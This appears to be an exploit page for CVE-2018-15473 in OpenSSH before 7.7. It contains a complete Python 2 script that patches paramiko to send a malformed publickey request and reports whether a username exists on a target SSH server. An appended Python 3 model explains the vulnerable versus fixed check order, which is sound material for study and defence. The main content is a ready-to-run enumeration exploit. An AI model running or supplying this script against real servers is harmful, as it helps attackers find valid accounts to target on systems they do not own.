OpenSSH < 7.7 - User Enumeration
Source: https://leapsecurity.io  Author: LeapSecurity  Published: 2018-12-05
#!/usr/bin/env python2
# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io
# Credits: Matthew Daley, Justin Gardner, Lee David Painter
 
 
import argparse, logging, paramiko, socket, sys, os
 
class InvalidUsername(Exception):
    pass
 
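# no-op replacement for Message.add_boolean: once installed, the publickey
# auth request is built without its boolean field, so the packet is malformed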
def add_boolean(*args, **kwargs):
    pass
 
# keep the original MSG_SERVICE_ACCEPT handler so the wrapper below can still call it
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[
        paramiko.common.MSG_SERVICE_ACCEPT]
 
# malicious function to overwrite MSG_SERVICE_ACCEPT handler
def service_accept(*args, **kwargs):
    paramiko.message.Message.add_boolean = add_boolean
    return old_service_accept(*args, **kwargs)
 
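# handler for MSG_USERAUTH_FAILURE: the server answered the malformed request
# with a failure message, which the script treats as an invalid username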
def invalid_username(*args, **kwargs):
    raise InvalidUsername()
 
# assign functions to respective handlers
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username
 
# perform authentication with malicious packet and username
def check_user(username):
    sock = socket.socket()
    sock.connect((args.target, args.port))
    transport = paramiko.transport.Transport(sock)
 
    try:
        transport.start_client()
    except paramiko.ssh_exception.SSHException:
        print '[!] Failed to negotiate SSH transport'
        sys.exit(2)
 
    try:
        transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
    except InvalidUsername:
        print "[-] {} is an invalid username".format(username)
        sys.exit(3)
    except paramiko.ssh_exception.AuthenticationException:
        print "[+] {} is a valid username".format(username)
 
# remove paramiko logging
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
 
parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')
parser.add_argument('target', help="IP address of the target system")
parser.add_argument('-p', '--port', type=int, default=22, help="Set port of SSH service")
parser.add_argument('username', help="Username to check for validity.")
 
if len(sys.argv) == 1:
    parser.print_help()
    sys.exit(1)
 
args = parser.parse_args()
 
check_user(args.username)
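
The response difference the script keys on, as an added example (not code from the original page or from OpenSSH): a simplified Python 3 model of the server-side check order before and after the CVE-2018-15473 fix, in which user validity is checked only after the request has been fully parsed. The account list, function names and field values are constructed for illustration.

```python
import struct

KNOWN_USERS = {"alice"}  # constructed sample account list (assumption)

class Disconnect(Exception):
    """Models the server dropping the connection on an unparseable packet."""

def ssh_string(data):
    return struct.pack(">I", len(data)) + data

def publickey_fields(with_boolean):
    # Method-specific fields of a publickey request (RFC 4252, section 7):
    # boolean (FALSE = key query, no signature), algorithm name, key blob.
    body = ssh_string(b"ssh-rsa") + ssh_string(b"\x00" * 16)  # constructed values
    return (b"\x00" if with_boolean else b"") + body

def parse_fields(buf):
    # Read boolean + two length-prefixed strings; abort if the buffer runs short.
    def take(n):
        nonlocal buf
        if len(buf) < n:
            raise Disconnect("incomplete message")
        head, buf = buf[:n], buf[n:]
        return head
    has_sig = take(1) != b"\x00"
    algorithm = take(struct.unpack(">I", take(4))[0])
    key_blob = take(struct.unpack(">I", take(4))[0])
    return has_sig, algorithm, key_blob

def handle_vulnerable(user, fields):
    # Pre-fix ordering: unknown users are rejected before the packet is parsed.
    if user not in KNOWN_USERS:
        return "USERAUTH_FAILURE"
    parse_fields(fields)
    return "USERAUTH_FAILURE"  # parsed fine, but the key is not authorized

def handle_fixed(user, fields):
    # Fixed ordering: parse the whole request first, for every user.
    parse_fields(fields)
    return "USERAUTH_FAILURE"

def observe(handler, user, fields):
    # What the client sees: a failure message or a dropped connection.
    try:
        return handler(user, fields)
    except Disconnect:
        return "DISCONNECT"

if __name__ == "__main__":
    bad = publickey_fields(with_boolean=False)
    for handler in (handle_vulnerable, handle_fixed):
        for user in ("alice", "nobody"):
            print(handler.__name__, user, observe(handler, user, bad))
```

With the fixed ordering a malformed request gets the same response whether or not the account exists, so the response no longer reveals which usernames are valid.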
 